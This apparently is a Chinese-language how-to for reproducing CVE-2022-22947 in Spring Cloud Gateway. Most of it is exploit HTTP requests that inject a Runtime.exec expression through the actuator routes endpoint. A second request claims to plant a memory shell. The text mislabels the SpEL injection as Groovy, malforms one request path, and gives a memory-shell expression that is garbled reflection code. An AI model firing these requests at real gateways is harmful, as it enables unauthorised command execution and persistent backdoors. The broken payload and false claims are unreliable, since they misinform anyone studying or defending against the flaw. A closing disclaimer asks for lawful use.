springboot gateway命令执行漏洞复现(CVE-2022-22947)＋内存马

该问题涉及到Spring Cloud Gateway中的一个命令执行漏洞（CVE-2022-22947），该漏洞允许未授权攻击者通过发送特制的HTTP请求在目标服务器上执行任意命令。

复现该漏洞的步骤如下：

1. 确保你有一个Spring Boot应用程序正在使用Spring Cloud Gateway。
2. 使用漏洞利用工具或者手动发送一个HTTP请求，利用Groovy模板表达式注入执行任意命令。

例如，使用如下的HTTP请求可以尝试触发漏洞：

POST /actuator/gateway/routes/hackhttp://command_exec_endpoint HTTP/1.1
Host: your-gateway-host
Accept: */*
Content-Length: length
Content-Type: application/json
 
{
  "id": "hack",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "${T(java.lang.Runtime).getRuntime().exec('your-command')}"
    }
  }],
  "uri": "http://command_exec_endpoint",
  "order": 0
}

替换your-gateway-host为你的网关服务器地址，your-command为你想执行的命令。

针对内存马的需求，你可以在Groovy表达式中使用Base64编码的payload来执行。

POST /actuator/gateway/routes/hack HTTP/1.1
Host: your-gateway-host
Accept: */*
Content-Length: length
Content-Type: application/json
 
{
  "id": "hack",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "${T(java.lang.Runtime).getRuntime().exec(T(java.lang.String).forName(T(java.lang.ClassLoader).getSystemClassLoader().loadClass('java.lang.Runtime').getDeclaredMethod('getDeclaredMethod', T(java.lang.Class).forName('[Ljava.lang.Class;')).invoke(null, T(java.lang.Class).forName('[Ljava.lang.Class;').cast([T(java.io.Serializable).class])).getDeclaredMethod('getSystemClassLoader').invoke(null), 'getResourceAsStream', T(java.lang.Class).forName('java.lang.Class')).getResourceAsStream('your-payload-resource').text)}"
    }
  }],
  "uri": "http://command_exec_endpoint",
  "order": 0
}

替换your-payload-resource为你的内存马资源路径。

请注意，实际操作时应确保你有权限执行命令和修改路由配置，且应遵守相关法律法规和道德标准，不得用于非法活动。